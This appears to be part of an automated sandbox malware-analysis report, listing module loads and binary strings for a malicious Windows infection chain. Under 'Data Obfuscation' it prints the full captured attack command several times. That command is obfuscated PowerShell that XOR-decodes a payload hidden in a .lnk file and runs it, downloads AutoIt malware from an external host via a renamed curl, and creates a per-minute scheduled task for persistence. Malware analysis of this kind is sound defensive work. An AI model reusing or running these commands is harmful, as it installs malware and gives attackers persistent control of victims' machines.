Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: secur32.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: sspicli.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: iphlpapi.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: mswsock.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: kernel.appcore.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: dnsapi.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: rasadhlp.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: fwpuclnt.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: schannel.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: mskeyprotect.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: ntasn1.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: ncrypt.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: ncryptsslp.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: secur32.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: sspicli.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: iphlpapi.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: mswsock.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: kernel.appcore.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: dnsapi.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: rasadhlp.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: fwpuclnt.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: schannel.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: mskeyprotect.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: ntasn1.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: ncrypt.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: secur32.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: sspicli.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: iphlpapi.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: mswsock.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: kernel.appcore.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: dnsapi.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: rasadhlp.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: fwpuclnt.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: schannel.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: mskeyprotect.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: ntasn1.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: ncrypt.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: ncryptsslp.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: secur32.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: sspicli.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: iphlpapi.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: mswsock.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: kernel.appcore.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: dnsapi.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: rasadhlp.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: fwpuclnt.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: schannel.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: mskeyprotect.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: ntasn1.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: ncrypt.dll
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1453710911.0000026329A81000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000006.00000002.1453411821.0000026329A40000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.1453710911.0000026329A81000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000006.00000002.1437718358.0000026329676000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdb source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: on.pdb source: powershell.exe, 00000006.00000002.1437718358.0000026329676000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.1453710911.0000026329A81000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1437718358.0000026329676000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: curl.pdb source: GSlLzFnTov.exe, 00000008.00000000.1395554704.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000009.00000002.1453592808.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000009.00000000.1415716755.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr
Source: Binary string: .pdb8; source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 089\System.Core.pdb source: powershell.exe, 00000006.00000002.1453411821.0000026329A40000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *on.pdb source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c 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||goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe 
c:\GSlLzFnTov\QwbpjvdmTA.au3"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c 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||goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn 
"QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ||goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function 
vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force; Jump to behavior
